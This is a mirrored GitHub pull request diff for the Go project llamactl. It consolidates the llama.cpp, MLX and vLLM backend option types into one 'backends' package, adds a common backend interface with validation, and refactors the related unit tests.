mirror of
https://github.com/lordmathis/llamactl.git
synced 2025-11-06 09:04:27 +00:00
Merge pull request #68 from lordmathis/refactor/backend-options
refactor: Move all backend type switching to backends package
This commit is contained in:
6
.gitignore
vendored
6
.gitignore
vendored
@@ -37,3 +37,9 @@ dist/
|
||||
__pycache__/
|
||||
|
||||
site/
|
||||
|
||||
# Dev config
|
||||
llamactl.dev.yaml
|
||||
|
||||
# Debug files
|
||||
__debug*
|
||||
2
.vscode/launch.json
vendored
2
.vscode/launch.json
vendored
@@ -12,7 +12,7 @@
|
||||
"program": "${workspaceFolder}/cmd/server/main.go",
|
||||
"env": {
|
||||
"GO_ENV": "development",
|
||||
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
|
||||
"LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
|
||||
},
|
||||
}
|
||||
]
|
||||
|
||||
@@ -1,10 +1,251 @@
|
||||
package backends
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/validation"
|
||||
"maps"
|
||||
)
|
||||
|
||||
type BackendType string
|
||||
|
||||
const (
|
||||
BackendTypeLlamaCpp BackendType = "llama_cpp"
|
||||
BackendTypeMlxLm BackendType = "mlx_lm"
|
||||
BackendTypeVllm BackendType = "vllm"
|
||||
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
|
||||
)
|
||||
|
||||
type backend interface {
|
||||
BuildCommandArgs() []string
|
||||
BuildDockerArgs() []string
|
||||
GetPort() int
|
||||
SetPort(int)
|
||||
GetHost() string
|
||||
Validate() error
|
||||
}
|
||||
|
||||
var backendConstructors = map[BackendType]func() backend{
|
||||
BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
|
||||
BackendTypeMlxLm: func() backend { return &MlxServerOptions{} },
|
||||
BackendTypeVllm: func() backend { return &VllmServerOptions{} },
|
||||
}
|
||||
|
||||
type Options struct {
|
||||
BackendType BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
|
||||
// Backend-specific options
|
||||
LlamaServerOptions *LlamaServerOptions `json:"-"`
|
||||
MlxServerOptions *MlxServerOptions `json:"-"`
|
||||
VllmServerOptions *VllmServerOptions `json:"-"`
|
||||
}
|
||||
|
||||
func (o *Options) UnmarshalJSON(data []byte) error {
|
||||
type Alias Options
|
||||
aux := &struct {
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(o),
|
||||
}
|
||||
|
||||
if err := json.Unmarshal(data, aux); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Create backend from constructor map
|
||||
if o.BackendOptions != nil {
|
||||
constructor, exists := backendConstructors[o.BackendType]
|
||||
if !exists {
|
||||
return fmt.Errorf("unsupported backend type: %s", o.BackendType)
|
||||
}
|
||||
|
||||
backend := constructor()
|
||||
optionsData, err := json.Marshal(o.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
if err := json.Unmarshal(optionsData, backend); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal backend options: %w", err)
|
||||
}
|
||||
|
||||
// Store in the appropriate typed field for backward compatibility
|
||||
o.setBackendOptions(backend)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (o *Options) MarshalJSON() ([]byte, error) {
|
||||
type Alias Options
|
||||
aux := &struct {
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(o),
|
||||
}
|
||||
|
||||
// Get backend and marshal it
|
||||
backend := o.getBackend()
|
||||
if backend != nil {
|
||||
optionsData, err := json.Marshal(backend)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
|
||||
}
|
||||
}
|
||||
|
||||
return json.Marshal(aux)
|
||||
}
|
||||
|
||||
// setBackendOptions stores the backend in the appropriate typed field
|
||||
func (o *Options) setBackendOptions(bcknd backend) {
|
||||
switch v := bcknd.(type) {
|
||||
case *LlamaServerOptions:
|
||||
o.LlamaServerOptions = v
|
||||
case *MlxServerOptions:
|
||||
o.MlxServerOptions = v
|
||||
case *VllmServerOptions:
|
||||
o.VllmServerOptions = v
|
||||
}
|
||||
}
|
||||
|
||||
func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
|
||||
switch o.BackendType {
|
||||
case BackendTypeLlamaCpp:
|
||||
return &backendConfig.LlamaCpp
|
||||
case BackendTypeMlxLm:
|
||||
return &backendConfig.MLX
|
||||
case BackendTypeVllm:
|
||||
return &backendConfig.VLLM
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// getBackend returns the actual backend implementation
|
||||
func (o *Options) getBackend() backend {
|
||||
switch o.BackendType {
|
||||
case BackendTypeLlamaCpp:
|
||||
return o.LlamaServerOptions
|
||||
case BackendTypeMlxLm:
|
||||
return o.MlxServerOptions
|
||||
case BackendTypeVllm:
|
||||
return o.VllmServerOptions
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
|
||||
if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
|
||||
backendSettings := o.getBackendSettings(backendConfig)
|
||||
return o.isDockerEnabled(backendSettings)
|
||||
}
|
||||
|
||||
// GetCommand builds the command to run the backend
|
||||
func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {
|
||||
|
||||
backendSettings := o.getBackendSettings(backendConfig)
|
||||
|
||||
if o.isDockerEnabled(backendSettings) {
|
||||
return "docker"
|
||||
}
|
||||
|
||||
return backendSettings.Command
|
||||
}
|
||||
|
||||
// buildCommandArgs builds command line arguments for the backend
|
||||
func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {
|
||||
|
||||
var args []string
|
||||
|
||||
backendSettings := o.getBackendSettings(backendConfig)
|
||||
backend := o.getBackend()
|
||||
if backend == nil {
|
||||
return args
|
||||
}
|
||||
|
||||
if o.isDockerEnabled(backendSettings) {
|
||||
// For Docker, start with Docker args
|
||||
args = append(args, backendSettings.Docker.Args...)
|
||||
args = append(args, backendSettings.Docker.Image)
|
||||
args = append(args, backend.BuildDockerArgs()...)
|
||||
|
||||
} else {
|
||||
// For native execution, start with backend args
|
||||
args = append(args, backendSettings.Args...)
|
||||
args = append(args, backend.BuildCommandArgs()...)
|
||||
}
|
||||
|
||||
return args
|
||||
}
|
||||
|
||||
// BuildEnvironment builds the environment variables for the backend process
|
||||
func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {
|
||||
|
||||
backendSettings := o.getBackendSettings(backendConfig)
|
||||
env := map[string]string{}
|
||||
|
||||
if backendSettings.Environment != nil {
|
||||
maps.Copy(env, backendSettings.Environment)
|
||||
}
|
||||
|
||||
if o.isDockerEnabled(backendSettings) {
|
||||
if backendSettings.Docker.Environment != nil {
|
||||
maps.Copy(env, backendSettings.Docker.Environment)
|
||||
}
|
||||
}
|
||||
|
||||
if environment != nil {
|
||||
maps.Copy(env, environment)
|
||||
}
|
||||
|
||||
return env
|
||||
}
|
||||
|
||||
func (o *Options) GetPort() int {
|
||||
backend := o.getBackend()
|
||||
if backend != nil {
|
||||
return backend.GetPort()
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func (o *Options) SetPort(port int) {
|
||||
backend := o.getBackend()
|
||||
if backend != nil {
|
||||
backend.SetPort(port)
|
||||
}
|
||||
}
|
||||
|
||||
func (o *Options) GetHost() string {
|
||||
backend := o.getBackend()
|
||||
if backend != nil {
|
||||
return backend.GetHost()
|
||||
}
|
||||
return "localhost"
|
||||
}
|
||||
|
||||
func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
|
||||
backendSettings := o.getBackendSettings(backendConfig)
|
||||
return backendSettings.ResponseHeaders
|
||||
}
|
||||
|
||||
// ValidateInstanceOptions performs validation based on backend type
|
||||
func (o *Options) ValidateInstanceOptions() error {
|
||||
backend := o.getBackend()
|
||||
if backend == nil {
|
||||
return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
|
||||
}
|
||||
|
||||
return backend.Validate()
|
||||
}
|
||||
|
||||
@@ -1,15 +1,16 @@
|
||||
package llamacpp
|
||||
package backends
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
"reflect"
|
||||
"strconv"
|
||||
)
|
||||
|
||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
// Used for both parsing (with underscores) and building (with dashes)
|
||||
var multiValuedFlags = map[string]bool{
|
||||
var llamaMultiValuedFlags = map[string]bool{
|
||||
// Parsing keys (with underscores)
|
||||
"override_tensor": true,
|
||||
"override_kv": true,
|
||||
@@ -335,11 +336,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts InstanceOptions to command line arguments
|
||||
func (o *LlamaServerOptions) BuildCommandArgs() []string {
|
||||
// Llama uses multiple flags for arrays by default (not comma-separated)
|
||||
// Use package-level multiValuedFlags variable
|
||||
return backends.BuildCommandArgs(o, multiValuedFlags)
|
||||
// Use package-level llamaMultiValuedFlags variable
|
||||
return BuildCommandArgs(o, llamaMultiValuedFlags)
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
||||
@@ -356,10 +387,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
||||
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
|
||||
executableNames := []string{"llama-server"}
|
||||
var subcommandNames []string // Llama has no subcommands
|
||||
// Use package-level multiValuedFlags variable
|
||||
// Use package-level llamaMultiValuedFlags variable
|
||||
|
||||
var llamaOptions LlamaServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
@@ -1,71 +1,38 @@
|
||||
package llamacpp_test
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"reflect"
|
||||
"slices"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
Verbose: true,
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check individual arguments
|
||||
expectedPairs := map[string]string{
|
||||
"--model": "/path/to/model.gguf",
|
||||
"--port": "8080",
|
||||
"--host": "localhost",
|
||||
"--ctx-size": "4096",
|
||||
"--gpu-layers": "32",
|
||||
}
|
||||
|
||||
for flag, expectedValue := range expectedPairs {
|
||||
if !containsFlagWithValue(args, flag, expectedValue) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
|
||||
}
|
||||
}
|
||||
|
||||
// Check standalone boolean flag
|
||||
if !contains(args, "--verbose") {
|
||||
t.Errorf("Expected --verbose flag not found in %v", args)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options llamacpp.LlamaServerOptions
|
||||
options backends.LlamaServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "verbose true",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
},
|
||||
expected: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "verbose false",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: false,
|
||||
},
|
||||
excluded: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
FlashAttn: true,
|
||||
Mlock: false,
|
||||
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !contains(args, expectedArg) {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
Threads: 4,
|
||||
CtxSize: 2048,
|
||||
GPULayers: 16,
|
||||
Temperature: 0.7,
|
||||
TopK: 40,
|
||||
TopP: 0.9,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
expectedPairs := map[string]string{
|
||||
"--port": "8080",
|
||||
"--threads": "4",
|
||||
"--ctx-size": "2048",
|
||||
"--gpu-layers": "16",
|
||||
"--temp": "0.7",
|
||||
"--top-k": "40",
|
||||
"--top-p": "0.9",
|
||||
}
|
||||
|
||||
for flag, expectedValue := range expectedPairs {
|
||||
if !containsFlagWithValue(args, flag, expectedValue) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
Threads: 0, // Should be excluded
|
||||
Temperature: 0, // Should be excluded
|
||||
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||
DrySequenceBreaker: []string{".", "!", "?"},
|
||||
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
|
||||
for flag, values := range expectedOccurrences {
|
||||
for _, value := range values {
|
||||
if !containsFlagWithValue(args, flag, value) {
|
||||
if !testutil.ContainsFlagWithValue(args, flag, value) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Lora: []string{}, // Empty array should not generate args
|
||||
OverrideTensor: []string{}, // Empty array should not generate args
|
||||
}
|
||||
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
|
||||
excludedArgs := []string{"--lora", "--override-tensor"}
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||
// Test snake_case to kebab-case conversion
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
ThreadsBatch: 2,
|
||||
FlashAttn: true,
|
||||
TopK: 40,
|
||||
TopP: 0.9,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that field names are properly converted
|
||||
expectedFlags := []string{
|
||||
"--ctx-size", // ctx_size -> ctx-size
|
||||
"--gpu-layers", // gpu_layers -> gpu-layers
|
||||
"--threads-batch", // threads_batch -> threads-batch
|
||||
"--flash-attn", // flash_attn -> flash-attn
|
||||
"--top-k", // top_k -> top-k
|
||||
"--top-p", // top_p -> top-p
|
||||
}
|
||||
|
||||
for _, flag := range expectedFlags {
|
||||
if !contains(args, flag) {
|
||||
t.Errorf("Expected flag %q not found in %v", flag, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
jsonData := `{
|
||||
"model": "/path/to/model.gguf",
|
||||
"port": 8080,
|
||||
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
"temp": 0.7
|
||||
}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
jsonData string
|
||||
checkFn func(llamacpp.LlamaServerOptions) error
|
||||
checkFn func(backends.LlamaServerOptions) error
|
||||
}{
|
||||
{
|
||||
name: "threads alternatives",
|
||||
jsonData: `{"t": 4, "tb": 2}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Threads != 4 {
|
||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||
}
|
||||
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "context size alternatives",
|
||||
jsonData: `{"c": 2048}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.CtxSize != 2048 {
|
||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "gpu layers alternatives",
|
||||
jsonData: `{"ngl": 16}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.GPULayers != 16 {
|
||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "model alternatives",
|
||||
jsonData: `{"m": "/path/model.gguf"}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "temperature alternatives",
|
||||
jsonData: `{"temp": 0.8}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Temperature != 0.8 {
|
||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||
}
|
||||
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for invalid JSON")
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
jsonData := `{
|
||||
"lora": ["adapter1.bin", "adapter2.bin"],
|
||||
"override_tensor": ["tensor1", "tensor2"],
|
||||
"dry_sequence_breaker": [".", "!", "?"]
|
||||
}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.LlamaServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model.gguf --ctx-size 4096",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.CtxSize != 4096 {
|
||||
t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 16 {
|
||||
t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
|
||||
}
|
||||
if !opts.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "quoted strings",
|
||||
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.APIKey != "sk-1234567890abcdef" {
|
||||
t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/test/model.gguf" {
|
||||
t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
if opts.Temperature != 0.7 {
|
||||
t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
|
||||
}
|
||||
if !opts.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
if !opts.NoMmap {
|
||||
t.Errorf("expected no_mmap to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
@@ -423,7 +385,7 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := llamacpp.ParseLlamaCommand(tt.command)
|
||||
result, err := backends.ParseLlamaCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
@@ -439,43 +401,19 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseLlamaCommandValues(t *testing.T) {
|
||||
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
|
||||
result, err := llamacpp.ParseLlamaCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "/test/model.gguf" {
|
||||
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
|
||||
}
|
||||
|
||||
if result.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
|
||||
}
|
||||
|
||||
if result.Temperature != 0.7 {
|
||||
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
|
||||
}
|
||||
|
||||
if !result.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
|
||||
if !result.NoMmap {
|
||||
t.Errorf("expected no_mmap to be true")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseLlamaCommandArrays(t *testing.T) {
|
||||
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
|
||||
result, err := llamacpp.ParseLlamaCommand(command)
|
||||
result, err := backends.ParseLlamaCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
@@ -492,20 +430,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions
|
||||
func contains(slice []string, item string) bool {
|
||||
return slices.Contains(slice, item)
|
||||
}
|
||||
|
||||
func containsFlagWithValue(args []string, flag, value string) bool {
|
||||
for i, arg := range args {
|
||||
if arg == flag {
|
||||
// Check if there's a next argument and it matches the expected value
|
||||
if i+1 < len(args) && args[i+1] == value {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
@@ -1,7 +1,8 @@
|
||||
package mlx
|
||||
package backends
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
)
|
